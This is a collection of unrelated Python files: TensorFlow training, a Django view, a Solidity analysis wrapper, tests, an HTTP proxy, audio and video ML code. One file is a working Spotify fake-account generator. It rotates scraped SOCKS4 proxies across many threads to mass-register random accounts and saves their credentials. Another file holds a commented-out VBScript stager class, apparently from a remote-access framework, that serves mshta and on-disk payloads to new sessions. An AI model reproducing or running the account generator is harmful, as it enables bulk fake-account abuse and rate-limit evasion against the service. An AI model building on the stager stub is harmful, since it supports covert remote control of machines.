tf.train.StopAtStepHook(num_steps=max_steps),
tf.train.CheckpointSaverHook(save_steps=a.save_freq,checkpoint_dir=a.output_dir,saver=saver),
tf.train.SummarySaverHook(save_steps=a.summary_freq, summary_op=summary_op),
logging_hook,
tf.train.StepCounterHook(every_n_steps=a.progress_freq),
SaveImageHook(output_dir=a.output_dir, fetches=display_fetches, save_steps=a.save_freq),
ProgressLoggingHook(log_steps=a.progress_freq, max_steps=max_steps)
]
global_step = tf.train.get_or_create_global_step()
get_global_step = tf.train.get_global_step()
if(a.checkpoint is not None):
ckpt = tf.train.get_checkpoint_state(a.checkpoint)
if ckpt:
last_model = ckpt.model_checkpoint_path
print("start with existing checkpoint ", ckpt.model_checkpoint_path)
else:
print("error no checkpoint found")
exit(1)
scaffold = None
else:
init_op=tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())
scaffold = tf.train.Scaffold(init_op)
print("start from no checkpoint")
with tf.train.MonitoredTrainingSession(master=server.target,
config=tf.ConfigProto(allow_soft_placement=True),
is_chief=True,
scaffold = scaffold,
checkpoint_dir = a.checkpoint,
hooks=hooks) as sess:
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
try:
while not sess.should_stop():
out = sess.run(model)
except tf.errors.OutOfRangeError:
print('Done training -- epoch limit reached')
finally:
coord.request_stop()
coord.join(threads)
main()
|
11547011
|
from django.views.decorators.csrf import csrf_exempt
from canvas.exceptions import NotLoggedIntoFacebookError
from canvas.shortcuts import r2r
from canvas.util import get_fb_api
@csrf_exempt
def facebook_iframe(request):
fb_message_id = request.GET.get('request_ids')
try:
fb_user, fb = get_fb_api(request)
app_requests = fb.request('{}/apprequests'.format(fb_user['id']))
redirect_url = None
for app_request in app_requests['data']:
if not redirect_url:
redirect_url = app_request.get('data')
fb.delete_object(app_request['id'])
if not redirect_url:
redirect_url = '/'
except NotLoggedIntoFacebookError:
redirect_url = '/'
context = {
'request': request,
'fb_message_id': fb_message_id,
'redirect_url': redirect_url,
}
resp = r2r('facebook_app/facebook_iframe.django.html', context)
resp.set_cookie('fb_message_id', fb_message_id)
return resp
|
11547037
|
import platform
import random
import string
import threading
import time
from os import system
import requests
if platform.system() == "Windows": # checking OS
title = "windows"
else:
title = "linux"
def randomName(size=10, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
def randomPassword(size=14, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
global maxi
global created
created = 0
errors = 0
class proxy():
def update(self):
while True:
data = ''
urls = ["https://api.proxyscrape.com/?request=getproxies&proxytype=socks4&timeout=10000&ssl=yes"]
for url in urls:
data += requests.get(url).text
self.splited += data.split("\r\n") #scraping and splitting proxies
time.sleep(600)
def get_proxy(self):
random1 = random.choice(self.splited) #choose a random proxie
return random1
def FormatProxy(self):
proxyOutput = {'https' :'socks4://'+self.get_proxy()}
return proxyOutput
def __init__(self):
self.splited = []
threading.Thread(target=self.update).start()
time.sleep(3)
proxy1 = proxy()
def creator():
global maxi
global created
global errors
while maxi > created:
if title == "windows":
system("title "+ f"Spotify Account Creator by KevinLage https://github.com/KevinLage/Spotify-Account-Creator Created: {created}/{maxi} Errors:{errors}")
s = requests.session()
email = randomName()
password = <PASSWORD>()
data={
"displayname":"Josh",
"creation_point":"https://login.app.spotify.com?utm_source=spotify&utm_medium=desktop-win32&utm_campaign=organic",
"birth_month":"12",
"email":email + <EMAIL>",
"password":password,
"creation_flow":"desktop",
"platform":"desktop",
"birth_year":"1991",
"iagree":"1",
"key":"<KEY>",
"birth_day":"17",
"gender":"male",
"password_repeat":password,
"referrer":""
}
try:
r = s.post("https://spclient.wg.spotify.com/signup/public/v1/account/",data=data,proxies=proxy1.FormatProxy())
if '{"status":1,"' in r.text:
open("created.txt", "a+").write(email + "@<EMAIL>:" + password + "\n")
created += 1
if title == "windows":
system("title "+ f"Spotify Account Creator : {created}/{maxi} Errors:{errors}")
else:
errors += 1
except:
pass
maxi = int(input("How many accounts do you want to create?\n"))
maxthreads = int(input("How many Threads?\n"))
num = 0
while num < maxthreads:
num += 1
threading.Thread(target=creator).start() # Start Checking Thread
|
11547050
|
import shlex
import subprocess
import os
import re
import sys
import global_params
import argparse
try:
import z3
import z3util
except:
print "Error: Z3 is not available. Please install z3 from https://github.com/Z3Prover/z3."
exit(0)
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def main():
# TODO: Implement -o switch.
parser = argparse.ArgumentParser()
parser.add_argument("source", type=str, help="Solidity file name by default, bytecode if -e is enabled. Use stdin to read from stdin.")
parser.add_argument("-b", "--bytecode", help="read bytecode in source instead of solidity file.", action="store_true")
parser.add_argument("-j", "--json", help="Redirect results to a json file.", action="store_true")
parser.add_argument("-e", "--evm", help="Do not remove the .evm file.", action="store_true")
parser.add_argument("-p", "--paths", help="Print path condition information.", action="store_true")
parser.add_argument("--error", help="Enable exceptions and print output. Monsters here.", action="store_true")
parser.add_argument("-t", "--timeout", type=int, help="Timeout for Z3.")
parser.add_argument("-d", "--debug", help="Enable debug .log file.", action="store_true")
parser.add_argument("-v", "--verbose", help="Verbose output, print everything.", action="store_true")
parser.add_argument("-r", "--report", help="Create .report file.", action="store_true")
args = parser.parse_args()
if args.timeout:
global_params.TIMEOUT = args.timeout
global_params.PRINT_PATHS = 1 if args.paths else 0
global_params.PRINT_MODE = 1 if args.verbose else 0
global_params.REPORT_MODE = 1 if args.report else 0
global_params.DEBUG_MODE = 1 if args.debug else 0
global_params.IGNORE_EXCEPTIONS = 1 if args.error else 0
if not cmd_exists("disasm"):
print "disasm is missing. Please install go-ethereum and make sure disasm is in the path."
return
if args.bytecode:
disasm_out = ""
try:
disasm_p = subprocess.Popen(shlex.split('disasm'), stdout=subprocess.PIPE, stdin=subprocess.PIPE)
disasm_out = disasm_p.communicate(input=open(args.source).read())[0]
except:
print "Disassembly failed."
# Run symExec
with open(args.source+'.disasm', 'w') as of:
of.write(disasm_out)
# TODO: Do this as an import and run, instead of shell call and hacky fix
os.system('python symExec.py %s.disasm %d %d %d %d %d %d %d %d %d %d %s' % (args.source, global_params.IGNORE_EXCEPTIONS, global_params.REPORT_MODE, global_params.PRINT_MODE, global_params.DATA_FLOW, global_params.DEBUG_MODE, global_params.CHECK_CONCURRENCY_FP, global_params.TIMEOUT, global_params.UNIT_TEST, global_params.GLOBAL_TIMEOUT, global_params.PRINT_PATHS, args.source+".json" if args.json else ""))
os.system('rm %s.disasm' % (args.source))
return
if not cmd_exists("solc"):
print "solc is missing. Please install the solidity compiler and make sure solc is in the path."
return
# Compile first
solc_cmd = "solc --optimize --bin-runtime %s"
FNULL = open(os.devnull, 'w')
solc_p = subprocess.Popen(shlex.split(solc_cmd % args.source), stdout = subprocess.PIPE, stderr=FNULL)
solc_out = solc_p.communicate()
for (cname, bin_str) in re.findall(r"\n======= (.*?) =======\nBinary of the runtime part: \n(.*?)\n", solc_out[0]):
print "Contract %s:" % cname
bin_str += "\0"
disasm_out = ""
try:
disasm_p = subprocess.Popen(shlex.split('disasm'), stdout=subprocess.PIPE, stdin=subprocess.PIPE)
disasm_out = disasm_p.communicate(input=bin_str)[0]
except:
print "Disassembly failed."
# Run symExec
with open(cname+'.evm.disasm', 'w') as of:
of.write(disasm_out)
# TODO: Do this as an import and run, instead of shell call and hacky fix
os.system('python symExec.py %s.evm.disasm %d %d %d %d %d %d %d %d %d %d %s' % (cname, global_params.IGNORE_EXCEPTIONS, global_params.REPORT_MODE, global_params.PRINT_MODE, global_params.DATA_FLOW, global_params.DEBUG_MODE, global_params.CHECK_CONCURRENCY_FP, global_params.TIMEOUT, global_params.UNIT_TEST, global_params.GLOBAL_TIMEOUT, global_params.PRINT_PATHS, cname+".json" if args.json else ""))
if args.evm:
with open(cname+'.evm','w') as of:
of.write(bin_str)
os.system('rm %s.evm.disasm' % (cname))
if __name__ == '__main__':
main()
|
11547076
|
import time
import langid
import sys
import io
testData = []
totBytesUnicode = 0
totBytesUTF8 = 0
f = io.open(sys.argv[1], 'r', encoding='utf-8')
while True:
line = f.readline()
if line == '':
break
idx = line.find('\t')
if idx == -1:
continue
test = line[idx+1:].strip()
totBytesUnicode += len(test)
utf8 = test.encode('utf-8')
totBytesUTF8 += len(utf8)
testData.append(utf8)
print 'Tot bytes %s vs %s' % (totBytesUnicode, totBytesUTF8)
best = -1
for i in range(10):
answers = []
t0 = time.time()
for test in testData:
#answers.append(langid.classify(test)[0])
langid.classify(test)
t = time.time() - t0
print '%.1f msec' % (1000*t)
if best == -1 or t < best:
best = t
print ' **'
print 'Best %.1f msec; totBytes=%d MB/sec=%.1f' % \
(1000*best, totBytes, totBytes/1024./1024./best)
|
11547093
|
import pytest
from panini.async_test_client import AsyncTestClient
def run_panini():
from tests.async_test_client.separate_file.main import app
app.start()
@pytest.fixture
async def client():
client = await AsyncTestClient(run_panini).start()
yield client
await client.stop()
@pytest.mark.asyncio
async def test_request(client: AsyncTestClient):
subject = "separate_file.async_test_client.listen_request"
response = await client.request(subject, {})
assert response["success"] is True
assert response["message"] == subject
|
11547100
|
import os
import sys
import core.stager
from core.payload import Payload
import random
"""
class VBScriptStager(core.stager.Stager):
NAME = "VBScript Stager"
DESCRIPTION = "Listens for new sessions, using VBScript for payloads"
AUTHORS = ['RiskSense, Inc.']
# the type of job payloads
WORKLOAD = "vbs"
def run(self):
payloads = []
payloads.append(Payload("In Memory (Windows 2000 SP3+)", self.load_file("data/stager/vbscript/mshta.cmd")))
payloads.append(Payload("On Disk (All Windows)", self.load_file("data/stager/vbscript/disk.cmd")))
self.start_server(payloads)
def stage(self, server, handler, session, options):
script = self.load_script("data/stager/vbscript/work.vbs", options, True, False)
handler.reply(200, script)
def job(self, server, handler, session, job, options):
script = self.load_script("data/stager/vbscript/job.vbs", options)
handler.reply(200, script)
"""
|
11547192
|
import numpy as np
import pandas as pd
from torch.utils.data import DataLoader
from model.unet import UNet
from train_util import CarvanaSegmenationTest
from datasets import CarvanaTestDataset
from config import *
def main():
df_test = pd.read_csv(DATA_ROOT / 'sample_submission.csv')
ids_test = df_test['img'].map(lambda s: s.split('.')[0])
test_dataset = CarvanaTestDataset(ids_test.values)
test_loader = DataLoader(test_dataset, shuffle=False, batch_size=TEST_BATCH_SIZE)
classifier = CarvanaSegmenationTest(net = UNet(), pred_folder = str(PREDICTIONS_DIR))
classifier.predict(test_loader)
if __name__ == '__main__':
main()
|
11547203
|
import random
import torch
from .base_model import BaseModel
from .generator import Generator
from .discriminator import BaseDiscriminator
from .layers.helpers import initialize_model, data_parallel
from .losses.perceptual_loss import PerceptualLoss
from .losses.ssim_loss import SSIMLoss
from .transform.point_sampler import sample_uniformly, sample_normally
class CORNModel(BaseModel):
def name(self):
return 'CORNModel'
def initialize(self, opt):
BaseModel.initialize(self, opt)
self.device = opt.device
self.points_3d = None
# specify the training loss names
self.loss_names = self.get_loss_names()
# specify the images you want to save/display. The program will call base_model.get_current_visuals
self.visual_names = []
for ii in range(opt.num_views):
self.visual_names += [f'src_{ii}', f'src_{ii}_rec', f'src_{ii}_pred', f'src_{ii}_mask', f'src_{ii}_mask_rec', f'src_{ii}_mask_pred']
self.visual_names += ['tgt', 'tgt_0_pred','tgt_1_pred', 'tgt_mask', 'tgt_0_mask_pred', 'tgt_1_mask_pred']
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks
if opt.isTrain and opt.lambda_GAN > 0.0:
self.model_names = ['G_NVS', 'D_NVS']
else:
self.model_names = ['G_NVS']
# Define the Generator network
self.netG_NVS = Generator(opt=opt)
self.netG_NVS = initialize_model(self.netG_NVS, opt)
self.netG_NVS = data_parallel(self.netG_NVS, self.opt)
# Define the Discriminator network
if opt.phase == 'train':
if opt.lambda_GAN > 0.0:
self.netD_NVS = BaseDiscriminator(opt)
self.netD_NVS = initialize_model(self.netD_NVS, opt)
self.netD_NVS = data_parallel(self.netD_NVS, self.opt)
# define loss functions
self.criterion_BCE = data_parallel(torch.nn.BCELoss(), opt)
self.criterion_L1 = data_parallel(torch.nn.L1Loss(), opt)
self.criterion_SSIM = data_parallel(SSIMLoss(), opt)
if opt.lambda_VGG > 0.0:
self.criterion_VGG = data_parallel(PerceptualLoss(), opt)
# initialize the optimizers
self.optimizer_G = torch.optim.Adam(self.netG_NVS.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers = {}
self.optimizers['optimizer_G'] = self.optimizer_G
if opt.lambda_GAN > 0.0:
self.optimizer_D = torch.optim.Adam(self.netD_NVS.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers['optimizer_D'] = self.optimizer_D
# Lambda factors
self.lambda_L1 = opt.lambda_L1
self.lambda_VGG = opt.lambda_VGG
self.lambda_GAN = opt.lambda_GAN
self.lambda_3D = opt.lambda_3D
self.lambda_SSIM = opt.lambda_SSIM
self.lambda_BCE = opt.lambda_BCE
self.lambda_TGT = opt.lambda_TGT
def set_input(self, input):
# Transfer data to device
self.src_0 = input['src_0'].to(self.device)
self.src_0_mask = input['src_0_mask'].to(self.device)
self.src_0_cam_pose = input['src_0_cam_pose'].to(self.device)
self.src_1 = input['src_1'].to(self.device)
self.src_1_mask = input['src_1_mask'].to(self.device)
self.src_1_cam_pose = input['src_1_cam_pose'].to(self.device)
self.tgt = input['tgt'].to(self.device)
self.tgt_mask = input['tgt_mask'].to(self.device)
self.tgt_cam_pose = input['tgt_cam_pose'].to(self.device)
def sample_points(self, batch_size):
if self.opt.point_sampling == 'uniform':
return sample_uniformly(self.opt.num_points, batch_size=batch_size)
else:
return sample_normally(self.opt.num_points, batch_size=batch_size)
def forward(self, points=None):
# Either receive 3D points or sample them
self.points_3d = self.sample_points(self.src_0.shape[0]).to(self.device) if points is None else points.to(self.device)
output = self.netG_NVS(self.src_0, self.src_0_cam_pose, self.tgt_cam_pose, self.points_3d)
self.tgt_0_pred = output['novel_views']
self.tgt_0_mask_pred = output['novel_masks']
self.src_0_feat = output['3D_features']
def backward_G(self):
# Decode source 0 features to get src_1 prediction
output = self.netG_NVS(None, None, self.src_1_cam_pose, self.points_3d, self.src_0_feat,
'decode')
self.src_1_rec, self.src_1_mask_rec = output['novel_views'], output['novel_masks']
# Source 1 to target
output = self.netG_NVS(self.src_1, self.src_1_cam_pose, self.tgt_cam_pose, self.points_3d)
self.tgt_1_pred = output['novel_views']
self.tgt_1_mask_pred = output['novel_masks']
self.src_1_feat = output['3D_features']
# Decode source 0 features to get src_1 prediction
output = self.netG_NVS(None, None, self.src_0_cam_pose, self.points_3d, self.src_1_feat,
'decode')
self.src_0_rec, self.src_0_mask_rec = output['novel_views'], output['novel_masks']
# Transformation chain src0 -> tgt - > src1
output = self.netG_NVS(self.tgt_0_pred, self.tgt_cam_pose, self.src_1_cam_pose, self.points_3d)
self.src_1_pred = output['novel_views']
self.src_1_mask_pred = output['novel_masks']
self.tgt_0_feat = output['3D_features']
# Transformation chain src1 -> tgt - > src0
output = self.netG_NVS(self.tgt_1_pred, self.tgt_cam_pose, self.src_0_cam_pose, self.points_3d)
self.src_0_pred = output['novel_views']
self.src_0_mask_pred = output['novel_masks']
self.tgt_1_feat = output['3D_features']
# Compute all the losses
zero_loss = torch.zeros(1).to(self.device)
self.loss_G_L1 = zero_loss if self.lambda_L1 <= 0 else \
self.criterion_L1(self.src_0_rec, self.src_0).mean() + \
self.criterion_L1(self.src_1_rec, self.src_1).mean() + \
self.criterion_L1(self.src_0_pred, self.src_0).mean() + \
self.criterion_L1(self.src_1_pred, self.src_1).mean()
# Occupancy loss
self.loss_G_BCE = zero_loss if self.lambda_BCE <= 0 else \
self.criterion_BCE(self.src_0_mask_rec, self.src_0_mask).mean() + \
self.criterion_BCE(self.src_1_mask_rec, self.src_1_mask).mean() + \
self.criterion_BCE(self.src_0_mask_pred, self.src_0_mask).mean() + \
self.criterion_BCE(self.src_1_mask_pred, self.src_1_mask).mean()
# SSIM Loss
self.loss_G_SSIM = zero_loss if self.lambda_SSIM <= 0 else \
self.criterion_SSIM(self.src_0_rec, self.src_0).mean() + \
self.criterion_SSIM(self.src_1_rec, self.src_1).mean() + \
self.criterion_SSIM(self.src_0_pred, self.src_0).mean() + \
self.criterion_SSIM(self.src_1_pred, self.src_1).mean()
# Feature loss
self.loss_G_3D = zero_loss if self.lambda_3D <= 0 else \
self.criterion_L1(self.tgt_0_feat, self.src_0_feat).mean() + \
self.criterion_L1(self.tgt_0_feat, self.src_1_feat).mean() + \
self.criterion_L1(self.tgt_1_feat, self.src_0_feat).mean() + \
self.criterion_L1(self.tgt_1_feat, self.src_1_feat).mean() + \
self.criterion_L1(self.src_0_feat, self.src_1_feat).mean() + \
self.criterion_L1(self.tgt_1_feat, self.tgt_0_feat).mean()
# GAN loss
self.loss_G_GAN = zero_loss if self.lambda_GAN <= 0 else \
self.netD_NVS(self.tgt_0_pred, self.src_0, mode='generator')['Sum'].mean() + \
self.netD_NVS(self.tgt_1_pred, self.src_1, mode='generator')['Sum'].mean()
# Perceptual Loss
self.loss_G_VGG = zero_loss if self.lambda_VGG <= 0 else \
self.criterion_VGG(self.src_0_rec, self.src_0).mean() + \
self.criterion_VGG(self.src_1_rec, self.src_1).mean() + \
self.criterion_VGG(self.src_0_pred, self.src_0).mean() + \
self.criterion_VGG(self.src_1_pred, self.src_1).mean()
# Target consistency loss
self.loss_G_TGT = zero_loss if self.lambda_TGT <= 0 else \
self.criterion_L1(self.tgt_0_pred, self.tgt_1_pred).mean()
self.loss_G = self.lambda_L1 * self.loss_G_L1 + self.lambda_3D * self.loss_G_3D \
+ self.lambda_SSIM * self.loss_G_SSIM + self.lambda_BCE * self.loss_G_BCE\
+ self.lambda_VGG * self.loss_G_VGG + self.lambda_GAN * self.loss_G_GAN \
+ self.lambda_TGT * self.loss_G_TGT
self.loss_G.backward()
def backward_D(self):
self.loss_D = self.netD_NVS(self.tgt_0_pred, self.src_0, mode='discriminator')['Sum'].mean() +\
self.netD_NVS(self.tgt_1_pred, self.src_1, mode='discriminator')['Sum'].mean()
self.loss_D.backward()
def optimize_parameters(self):
self.forward()
# Optimize the Generator
if self.lambda_GAN > 0.0:
self.set_requires_grad([self.netD_NVS], False)
self.optimizer_G.zero_grad()
self.backward_G()
self.optimizer_G.step()
# Optimize the Discriminator
if self.lambda_GAN > 0.0:
self.set_requires_grad([self.netD_NVS], True)
self.optimizer_D.zero_grad()
self.backward_D()
self.optimizer_D.step()
# Helper function to compute validation error on batch
def validate(self, input):
with torch.no_grad():
self.src = input['src_0'].to(self.device)
self.src_cam_pose = input['src_0_cam_pose'].to(self.device)
self.tgt_0 = input['tgt'].to(self.device)
self.tgt_0_cam_pose = input['tgt_cam_pose'].to(self.device)
self.forward()
return self.criterion_L1(self.tgt_0_pred, self.tgt_0).mean()
# used in test time, wrapping `forward` in no_grad() so we don't save
# intermediate steps for backprop
def test(self, input):
self.src_0 = input['src_0'].to(self.device)
self.src_0_mask = input['src_0_mask'].to(self.device)
self.src_0_cam_pose = input['src_0_cam_pose'].to(self.device)
self.tgt = input['tgt'].to(self.device)
self.tgt_mask = input['tgt_mask'].to(self.device)
self.tgt_cam_pose = input['tgt_cam_pose'].to(self.device)
with torch.no_grad():
self.forward()
|
11547205
|
import datetime
import copy
import pytest
from tempora.schedule import DelayedCommand, now
from pmxbot.core import AtHandler, Scheduled, command, Handler
class DelayedCommandMatch:
def __eq__(self, other):
return isinstance(other, DelayedCommand)
@pytest.fixture
def patch_scheduled_registry(monkeypatch):
"""
Ensure Scheduled._registry is not mutated by these tests.
"""
monkeypatch.setattr(Scheduled, '_registry', [])
@pytest.fixture
def patch_handler_registry(monkeypatch):
"""
Ensure Handler._registry is not mutated by these tests.
"""
monkeypatch.setattr(Handler, '_registry', [])
@pytest.mark.usefixtures("patch_handler_registry")
class TestCommandHandlerUniqueness:
def test_command_with_aliases(self):
@command(aliases='mc')
def my_cmd():
"help for my command"
assert len(Handler._registry) == 2
# attempt to re-registor both the command and its alias
for handler in Handler._registry:
copy.deepcopy(handler).register()
assert len(Handler._registry) == 2
@pytest.mark.usefixtures("patch_scheduled_registry")
class TestScheduledHandlerUniqueness:
@pytest.fixture
def handler(self):
return AtHandler(
name='some name',
channel='#some-channel',
when=now(),
func=lambda x: x,
doc='some doc',
)
def test_doesnt_schedule_same_command_twice(self, handler):
handler.register()
copy.copy(handler).register()
assert len(Scheduled._registry) == 1
def test_schedules_same_command_if_names_differ(self, handler):
handler.register()
handler2 = copy.copy(handler)
handler2.name = 'other'
handler2.register()
assert len(Scheduled._registry) == 2
def test_schedules_same_command_if_channels_differ(self, handler):
handler.register()
handler2 = copy.copy(handler)
handler2.channel = '#other'
handler2.register()
assert len(Scheduled._registry) == 2
def test_schedules_same_command_if_datetimes_differ(self, handler):
handler.register()
handler2 = copy.copy(handler)
handler2.when = handler.when + datetime.timedelta(days=15)
handler2.register()
assert len(Scheduled._registry) == 2
def test_schedules_same_command_if_docs_differ(self, handler):
handler.register()
handler2 = copy.copy(handler)
handler2.doc = 'other'
handler2.register()
assert len(Scheduled._registry) == 2
|
11547296
|
import errno
import os
import signal
import sys
import threading
import pywf as wf
class Context:
def __init__(self):
pass
cv = threading.Condition()
def Stop(signum, frame):
print("Stop server:", signum)
cv.acquire()
cv.notify()
cv.release()
def reply_callback(proxy_task):
series = wf.series_of(proxy_task)
ctx = series.get_context()
proxy_resp = proxy_task.get_resp()
sz = proxy_resp.get_body_size()
if proxy_task.get_state() == wf.WFT_STATE_SUCCESS:
print(
"{} Success, Http Status:{} Body Length:{}".format(
ctx.url, proxy_resp.get_status_code(), sz
)
)
else:
print(
"{} Reply failed:{} Body Length:{}".format(
ctx.url, os.strerror(proxy_task.get_error()), sz
)
)
def http_callback(t):
state = t.get_state()
error = t.get_error()
resp = t.get_resp()
series = wf.series_of(t)
ctx = series.get_context()
proxy_resp = ctx.proxy_task.get_resp()
if state == wf.WFT_STATE_SYS_ERROR and error == errno.ECONNRESET:
state = wf.WFT_STATE_SUCCESS
if state == wf.WFT_STATE_SUCCESS:
ctx.proxy_task.set_callback(reply_callback)
# move content from resp to proxy_resp, then you cannot use resp
resp.move_to(proxy_resp)
if not ctx.is_keep_alive:
proxy_resp.set_header_pair("Connection", "close")
else:
errstr = ""
if state == wf.WFT_STATE_SYS_ERROR:
errstr = "system error: {}".format(os.strerror(error))
elif state == wf.WFT_STATE_DNS_ERROR:
errstr = "DNS error: {}".format(error)
elif state == wf.WFT_STATE_SSL_ERROR:
errstr = "SSL error: {}".format(error)
else:
errstr = "URL error (Cannot be a HTTPS proxy)"
print(
"{} Fetch failed, state:{} error:{} {}".format(
ctx.url, state, error, errstr
)
)
proxy_resp.set_status_code("404")
proxy_resp.append_body(b"<html>404 Not Found.</html>")
def process(t):
req = t.get_req()
series = wf.series_of(t)
ctx = Context()
ctx.url = req.get_request_uri()
ctx.proxy_task = t
series.set_context(ctx)
ctx.is_keep_alive = req.is_keep_alive()
http_task = wf.create_http_task(req.get_request_uri(), 0, 0, http_callback)
req.set_request_uri(http_task.get_req().get_request_uri())
req.move_to(http_task.get_req())
http_task.get_resp().set_size_limit(200 * 1024 * 1024)
series << http_task
def main():
if len(sys.argv) != 2:
print("Usage {} <port>".format(sys.argv[0]))
sys.exit(1)
port = int(sys.argv[1])
signal.signal(signal.SIGINT, Stop)
server_params = wf.ServerParams()
server_params.request_size_limit = 8 * 1024 * 1024
server = wf.HttpServer(server_params, process)
if server.start(port) == 0:
cv.acquire()
cv.wait()
cv.release()
server.stop()
else:
print("Cannot start server")
sys.exit(1)
# Test it: curl -x http://localhost:10086/ http://sogou.com
if __name__ == "__main__":
main()
|
11547300
|
from statsd import StatsClient, TCPStatsClient
from time import sleep
statsd = TCPStatsClient(host='localhost',
port=1111,
prefix=None,
ipv6=False)
for i in range(100000):
statsd.incr('baz')
sleep(0.0001)
statsd.incr('baz')
|
11547378
|
from hashlib import md5
from kbinxml import KBinXML
from . import GenericFolder
class MD5Folder(GenericFolder):
def __init__(self, ifs_data, parent, obj, path = '', name = '', supers = None,
super_disable = False, super_skip_bad = False,
super_abort_if_bad = False, md5_tag = None, extension = None):
GenericFolder.__init__(self, ifs_data, parent, obj, path, name, supers,
super_disable, super_skip_bad, super_abort_if_bad)
self.md5_tag = md5_tag if md5_tag else self.name
self.extension = extension
def tree_complete(self):
GenericFolder.tree_complete(self)
self.info_kbin = None
self.info_file = None
for filename, file in self.files.items():
if filename.endswith('.xml'):
self.info_file = file
break
if not self.info_file:
#raise KeyError('MD5 folder contents have no mapping xml')
# _super_ references to info XML breaks things - just extract what we can
return
self.info_kbin = KBinXML(self.info_file.load(convert_kbin = False))
self._apply_md5()
def _apply_md5(self):
# findall needs xpath or it'll only search direct children
names = (tag.attrib['name'] for tag in self.info_kbin.xml_doc.findall('.//' + self.md5_tag))
self._apply_md5_folder(names, self)
def _apply_md5_folder(self, plain_list, folder):
for plain in plain_list:
hashed = md5(plain.encode(self.info_kbin.encoding)).hexdigest()
if self.extension:
plain += self.extension
# add correct packed name to deobfuscated filesystems
if plain in folder.files:
folder.files[plain]._packed_name = hashed
# deobfuscate packed filesystems
if hashed in folder.files:
orig = folder.files.pop(hashed)
orig.name = plain
folder.files[plain] = orig
|
11547407
|
import numpy as np
from .panner import DirectSpeakersPanner
from ..renderer_common import BlockProcessingChannel, InterpretTimingMetadata, FixedGains
from ..track_processor import TrackProcessor
class InterpretDirectSpeakersMetadata(InterpretTimingMetadata):
"""Interpret a sequence of DirectSpeakersTypeMetadata, producing a sequence of ProcessingBlock.
Args:
calc_gains (callable): Called with DirectSpeakersTypeMetadata to calculate per-channel gains.
"""
def __init__(self, calc_gains):
super(InterpretDirectSpeakersMetadata, self).__init__()
self.calc_gains = calc_gains
def __call__(self, sample_rate, block):
"""Yield ProcessingBlock that apply the processing for a given DirectSpeakersTypeMetadata.
Args:
sample_rate (int): Sample rate to operate in.
block (DirectSpeakersTypeMetadata): Metadata to interpret.
Yields:
One ProcessingBlock object that apply gains for a single input channel.
"""
start_time, end_time = self.block_start_end(block)
start_sample = sample_rate * start_time
end_sample = sample_rate * end_time
gains = self.calc_gains(block)
yield FixedGains(start_sample, end_sample, gains)
class DirectSpeakersRenderer(object):
options = DirectSpeakersPanner.options
@options.with_defaults
def __init__(self, layout, **options):
self._panner = DirectSpeakersPanner(layout, **options)
self._nchannels = len(layout.channels)
# tuples of a track spec processor and a BlockProcessingChannel to
# apply to the samples it produces.
self.block_processing_channels = []
def set_rendering_items(self, rendering_items):
"""Set the rendering items to process.
Note:
Since this resets the internal state, this should normally be called
once before rendering is started. Dynamic modification of the
rendering items could be implemented though another API.
Args:
rendering_items (list of DirectSpeakersRenderingItem): Items to process.
"""
self.block_processing_channels = [(TrackProcessor(item.track_spec),
BlockProcessingChannel(
item.metadata_source,
InterpretDirectSpeakersMetadata(self._panner.handle)))
for item in rendering_items]
def render(self, sample_rate, start_sample, input_samples):
"""Process n input samples to produce n output samples.
Args:
sample_rate (int): Sample rate.
start_sample (int): Index of the first sample in input_samples.
input_samples (ndarray of (k, k) float): Multi-channel input sample
block; there must be at least as many channels as referenced in the
rendering items.
Returns:
(ndarray of (n, l) float): l channels of output samples
corresponding to the l loudspeakers in layout.
"""
output_samples = np.zeros((len(input_samples), self._nchannels))
for track_spec_processor, block_processing in self.block_processing_channels:
track_samples = track_spec_processor.process(sample_rate, input_samples)
block_processing.process(sample_rate, start_sample, track_samples, output_samples)
return output_samples
|
11547412
|
import os
from sklearn.model_selection import train_test_split
import torch
import cv2
import numpy as np
from torch.utils.data import Dataset
from mypath import Path
import glob
import shutil
class VideoDataset(Dataset):
r"""A Dataset for a folder of videos. Expects the directory structure to be
directory->[train/val/test]->[class labels]->[videos]. Initializes with a list
of all file names, along with an array of labels, with label being automatically
inferred from the respective folder names.
Args:
dataset (str): Name of dataset. Defaults to 'breakfast'.
split (str): Determines which folder of the directory the dataset will read from. Defaults to 'train'.
clip_len (int): Determines how many frames are there in each clip. Defaults to 16.
preprocess (bool): Determines whether to preprocess dataset. Default is False.
"""
def __init__(self, dataset='breakfast', split='train', clip_len=16, preprocess=False):
self.root_dir, self.output_dir = Path.db_dir(dataset) #this is defined from the path file python file dataset.py
folder = os.path.join(self.output_dir, split)
self.clip_len = clip_len
self.split = split
# The following three parameters are chosen as described in the paper section 4.1
self.resize_height = 128
self.resize_width = 171
self.crop_size = 112
if not self.check_integrity():
raise RuntimeError('Dataset not found or corrupted.' +
' You need to download it from official website.')#if the dataset directory exists then we continue to the next method
if (not self.check_preprocess()) or preprocess:
#if the output directory doesnt exist , then we have to go to the method and carry out preprocessing
print('Preprocessing of {} dataset, this will take long, but it will be done only once.'.format(dataset))
self.preprocess() #after preprocessing is completed we move on
# Obtain all the filenames of files inside all the class folders
# Going through each class folder one at a time
self.fnames, labels = [], []
for label in sorted(os.listdir(folder)): #so for everything inside ucf101-->train
for fname in os.listdir(os.path.join(folder, label)): #and for everything inside all the folders of ucf101--> train . So for example everything inside ucf101-->train-->ApplyMakeup
self.fnames.append(os.path.join(folder, label, fname)) #add to the list that holds all the file names , the current file name . So at the end fnames will hold all the path like: a) ucf101-->train-->ApplyMakeup-->ApplyMakeup123_g0 b)ucf101-->train-->Yolo-->Yolo_scn3_g0
labels.append(label) #add the next action label-activity label to the list that holds all the activities-action labels . So it will hold ucf101-->train-->ApplyMakeup , ucf101-->train-->Yolo , ucf101-->train-->Typing,
assert len(labels) == len(self.fnames) # so the length of the labels list needs to be always equal to the length of the fnames list . If this is false then the program halts
print('Number of {} videos: {:d}'.format(split, len(self.fnames))) # so the number of train videos is equal to 2190
# Prepare a mapping between the label names (strings) and indices (ints)
